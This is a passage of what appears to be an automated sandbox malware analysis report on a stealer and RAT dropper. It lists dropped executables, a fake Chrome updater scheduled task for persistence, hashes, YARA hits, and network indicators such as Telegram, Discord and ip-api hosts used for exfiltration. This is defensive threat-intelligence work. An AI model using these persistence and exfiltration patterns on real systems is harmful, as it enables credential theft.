                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              17:47:28API Interceptor148x Sleep call for process: powershell.exe modified
                                                                                                              17:47:32API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                              17:47:33API Interceptor1x Sleep call for process: setup.exe modified
                                                                                                              17:47:38API Interceptor33x Sleep call for process: main.exe modified
                                                                                                              17:47:50Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                                                                                              17:48:23API Interceptor35578x Sleep call for process: cmd.exe modified
                                                                                                              17:48:23API Interceptor10826x Sleep call for process: WmiPrvSE.exe modified
                                                                                                              17:48:23API Interceptor34823x Sleep call for process: conhost.exe modified
                                                                                                              17:48:23API Interceptor23026x Sleep call for process: svchost.exe modified
                                                                                                              17:48:23API Interceptor65504x Sleep call for process: cstealer.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              208.95.112.1Z5l5CNjOJL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              lzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              Teklif-Formu.jarGet hashmaliciousSTRRATBrowse
                                                                                                              • ip-api.com/json/
                                                                                                              kDCWV8kDTq.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              ct5MWdiYZC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              SecuriteInfo.com.Win32.CrypterX-gen.19037.19274.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              92x1AqfTUQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              Teklif-Formu.jarGet hashmaliciousSTRRATBrowse
                                                                                                              • ip-api.com/json/
                                                                                                              TU5V4VyQl3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              17152359653a05b96d05ff5bef69786c7326d6262078875016233ef3d21642eb7337464dde415.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                              149.154.167.220lzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                MNhTlD222T.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                  ORDER_INQUIRY_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    rREQUESTFORQUOTATION2024.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        Se7CZnlXZZ.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                          vjk2FB3esY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                            COMPANY PROFILE_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              kzRQODdshQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                TRANSFER_PURCHASE ORDER 02052024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  162.159.138.232SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                    4PPlLk8IT5.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                      malware!!!.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          https://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.comGet hashmaliciousPhisherBrowse
                                                                                                                                            http://www.cyclic.sh/pricingGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              z40Lsbgddffz3E3gUR.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousPureLog Stealer, Vector StealerBrowse
                                                                                                                                                    nslookup.exeGet hashmaliciousBlank GrabberBrowse

                                                                                                                                                      Domains

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      discord.comkrampus.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                      • 162.159.136.232
                                                                                                                                                      ByfronExecutor.exeGet hashmaliciousPython Stealer, Discord Token Stealer, EmpyreanBrowse
                                                                                                                                                      • 162.159.135.232
                                                                                                                                                      nXaujG6G1F.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                                                                                                      • 162.159.137.232
                                                                                                                                                      Pine Hearts - Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 162.159.128.233
                                                                                                                                                      Pine Hearts - Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 162.159.137.232
                                                                                                                                                      1AyrVa6Wj3.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                                                                                      • 162.159.136.232
                                                                                                                                                      launcher.jarGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 162.159.137.232
                                                                                                                                                      launcher.jarGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                      • 162.159.136.232
                                                                                                                                                      SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                                                      • 162.159.128.233
                                                                                                                                                      SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                      • 162.159.138.232
                                                                                                                                                      ip-api.comZ5l5CNjOJL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      lzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      Teklif-Formu.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      kDCWV8kDTq.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      ct5MWdiYZC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.19037.19274.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      92x1AqfTUQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      Teklif-Formu.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      TU5V4VyQl3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      17152359653a05b96d05ff5bef69786c7326d6262078875016233ef3d21642eb7337464dde415.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      raw.githubusercontent.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      Move Mouse.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.199.110.133
                                                                                                                                                      ByfronExecutor.exeGet hashmaliciousPython Stealer, Discord Token Stealer, EmpyreanBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      https://broken-rain-1a74.1rwvvy66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 185.199.109.133
                                                                                                                                                      8PiY5IvjhI.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                      • 185.199.109.133
                                                                                                                                                      https://broken-rain-1a74.1rwvvy66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      https://broken-rain-1a74.1rwvvy66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 185.199.109.133
                                                                                                                                                      https://broken-rain-1a74.1rwvvy66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 185.199.111.133
                                                                                                                                                      SecuriteInfo.com.Win64.DropperX-gen.15585.25265.exeGet hashmaliciousXWormBrowse
                                                                                                                                                      • 185.199.111.133
                                                                                                                                                      eqmq0pcp.yew(1).exeGet hashmaliciousXmrigBrowse
                                                                                                                                                      • 185.199.111.133
                                                                                                                                                      api.telegram.orglzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MNhTlD222T.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      ORDER_INQUIRY_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      rREQUESTFORQUOTATION2024.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      Se7CZnlXZZ.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      vjk2FB3esY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      kzRQODdshQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      TRANSFER_PURCHASE ORDER 02052024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220

                                                                                                                                                      ASNs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      TELEGRAMRUlzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MNhTlD222T.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      4Qkny6GqTM.exeGet hashmaliciousKeygroupBrowse
                                                                                                                                                      • 149.154.167.99
                                                                                                                                                      ORDER_INQUIRY_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      rREQUESTFORQUOTATION2024.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      Se7CZnlXZZ.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      vjk2FB3esY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      COMPANY PROFILE_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      kzRQODdshQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      CLOUDFLARENETUShttps://qrco.de/WntxebLzUZRPvkbE7lS0v1K3POsozeEKGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 162.247.243.29
                                                                                                                                                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:446a8aa0-0ddf-4503-b329-6e498319961bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 172.64.155.179
                                                                                                                                                      stub.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 172.67.74.152
                                                                                                                                                      z43ISFFORMHBLDRAFTTHBL53164US7272Coscoline.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                      • 172.67.215.46
                                                                                                                                                      stub.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 172.67.74.152
                                                                                                                                                      https://cloudflare-ipfs.com/ipfs/bafkreiergbvqfr2ginrzh2334lrj2b5kcx5e6rbx2h6qovn34u2mcyb6xyGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.17.25.14
                                                                                                                                                      https://app.asana.com/app/asana/-/log?dest=https%3A%2F%2Fapp.asana.com%2F-%2Fmobile_web_email_login%3Fwa%3D127821c9468d9061b22a0dcde981af4a%26e%3Dbfanguy%2540uscortec.com&se=%7B%22name%22%3A%22AsanaLoaded%22%2C%22action%22%3A%22AsanaLoaded%22%2C%22sub_action%22%3A%22MagicLogin%22%2C%22location%22%3A%22MagicLoginEmail%22%2C%22domain%22%3Anull%2C%22domain_user%22%3Anull%2C%22user%22%3A1195607135831890%2C%22from_amp_email%22%3Afalse%2C%22non_user_action_event%22%3Afalse%2C%22email_uuid%22%3A%221715188399672Idf6803-3d26De4-a3ff3e4e9b9ccd%22%2C%22app_name%22%3A%22email%22%7D&rp=1195607135831890&hash=55999a967007d54aa7f5ae7781466d3ecff5abdb4784c581e8491f53c210d547Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.16.51.111
                                                                                                                                                      https://pub-5485e1bc9582400ab32d39cdd4221a65.r2.dev/link.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 104.17.2.184
                                                                                                                                                      8PCVwdtb1O.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.26.13.205
                                                                                                                                                      8PCVwdtb1O.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.26.12.205
                                                                                                                                                      TUT-ASUSZ5l5CNjOJL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      lzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      Teklif-Formu.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      kDCWV8kDTq.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      ct5MWdiYZC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.19037.19274.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      92x1AqfTUQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      Teklif-Formu.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      TU5V4VyQl3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      17152359653a05b96d05ff5bef69786c7326d6262078875016233ef3d21642eb7337464dde415.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 208.95.112.1
                                                                                                                                                      FASTLYUShttps://qrco.de/WntxebLzUZRPvkbE7lS0v1K3POsozeEKGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 151.101.2.133
                                                                                                                                                      https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:446a8aa0-0ddf-4503-b329-6e498319961bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 151.101.1.138
                                                                                                                                                      https://app.asana.com/app/asana/-/log?dest=https%3A%2F%2Fapp.asana.com%2F-%2Fmobile_web_email_login%3Fwa%3D127821c9468d9061b22a0dcde981af4a%26e%3Dbfanguy%2540uscortec.com&se=%7B%22name%22%3A%22AsanaLoaded%22%2C%22action%22%3A%22AsanaLoaded%22%2C%22sub_action%22%3A%22MagicLogin%22%2C%22location%22%3A%22MagicLoginEmail%22%2C%22domain%22%3Anull%2C%22domain_user%22%3Anull%2C%22user%22%3A1195607135831890%2C%22from_amp_email%22%3Afalse%2C%22non_user_action_event%22%3Afalse%2C%22email_uuid%22%3A%221715188399672Idf6803-3d26De4-a3ff3e4e9b9ccd%22%2C%22app_name%22%3A%22email%22%7D&rp=1195607135831890&hash=55999a967007d54aa7f5ae7781466d3ecff5abdb4784c581e8491f53c210d547Get hashmaliciousUnknownBrowse
                                                                                                                                                      • 151.101.1.187
                                                                                                                                                      https://pub-5485e1bc9582400ab32d39cdd4221a65.r2.dev/link.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 151.101.130.137
                                                                                                                                                      https://flow.page/afalcondocsGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 151.101.196.159
                                                                                                                                                      https://lookerstudio.google.com/reporting/2e73521b-7499-4933-b0bb-3deae3109277/page/aRYzDGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 151.101.194.137
                                                                                                                                                      IMG202404040007.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                      • 199.232.192.209
                                                                                                                                                      IMG202404040007.jarGet hashmaliciousSTRRATBrowse
                                                                                                                                                      • 199.232.192.209
                                                                                                                                                      http://links.spmail2.legacy.com/ctt?m=3001287&r=LTI0MDEwNTg0MjYS1&b=0&j=NDQzMTI5MDcyS0&mt=1&kt=12&kx=1&k=Funeral%2520Home&kd=https://refrigeracaolucas.com.br/main/RTRUA/UA/ZGlyay5kb25hdGhAbGNhdHRlcnRvbi5jb20K/%23RTR/RTRGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                      • 151.101.2.137
                                                                                                                                                      https://app.rule.io/browser/campaign/c/n_doqyGet hashmaliciousPhisherBrowse
                                                                                                                                                      • 151.101.1.195

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousMars Stealer, PrivateLoader, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      stub.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      8PCVwdtb1O.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      8PCVwdtb1O.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      wR0kjT941k.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      5Of8ZuGExZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      Z5l5CNjOJL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      5p3Hx8XIQO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      lzkaYYrJbB.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 185.199.108.133
                                                                                                                                                      qGw9V1CTJj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                      • 185.199.108.133

                                                                                                                                                      Dropped Files

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\ProgramData\setup.exehacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                                                                                        C:\Program Files\Google\Chrome\updater.exehacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Program Files\Google\Chrome\updater.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\setup.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5617152
                                                                                                                                                          Entropy (8bit):7.71585644239634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                                          MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                          SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                                                                          SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                                          SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: hacn.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

                                                                                                                                                          C:\ProgramData\Microsoft\based.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7242457
                                                                                                                                                          Entropy (8bit):7.992260600803165
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:98304:/ro9DjWM8JEE1rRlamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRGYKJJcGhE+:/ro90KeNTfm/pf+xk4dWRGtrbWOjgWyU
                                                                                                                                                          MD5:A71FC3CA1BD1AF148EE4C1BFABCBE0DA
                                                                                                                                                          SHA1:BBAF078956D577D05AB1CAC41CC530C1E780478D
                                                                                                                                                          SHA-256:4F9F2637C579B3C01C0031926BD29D3774D4D9435D70E8C7C2D17AEBA81E2441
                                                                                                                                                          SHA-512:EE4EE30004404A10DA6EB1C468DF1F905BD20ED4B9139E477563EB998243764F7A54D20E7980B029A3B28D4774B695B8EB21D143C1CDB6FD7401CC001C863F35
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...".;f.........."....&.....v......@..........@......................................n...`.....................................................x....p.......0...#...^n.H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X............"..............@..B........................................................................................................................................................................................

                                                                                                                                                          C:\ProgramData\Microsoft\hacn.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):25152315
                                                                                                                                                          Entropy (8bit):7.999194335744512
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:393216:IDfDoc6/4m7/VBPt2XP8b/B+6M+8TIZ/iy1K4yoJq1HmnlOUyv5fkpHwsX:Ib7QvBt2XP8DB+DlSJ1K4y5PhSQ
                                                                                                                                                          MD5:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                                                                                          SHA1:E2D35BC333EC6FF0F6AE60E55DACA44A433FC279
                                                                                                                                                          SHA-256:A7C3208CF3067D1DA12542CAB16516C9085620959DEB60DD000E190F15C74758
                                                                                                                                                          SHA-512:212A6540082A20DE6798D53E2C6F7F5705E5E4164620AA7F08A366E747F240C59C4C70CE0B8DD00625A0A960D1615073B4E48B2707ABE767B422F732C5927BED
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....];f.........."....%.....p.................@..........................................`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................

                                                                                                                                                          C:\ProgramData\main.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5872344
                                                                                                                                                          Entropy (8bit):7.487098820179109
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
                                                                                                                                                          MD5:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                                                                                          SHA1:5E980079F67215BF69B8C1C16B56F40BF4A29958
                                                                                                                                                          SHA-256:E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                                                                                                                                          SHA-512:8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

                                                                                                                                                          C:\ProgramData\setup.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                          Category:dropped
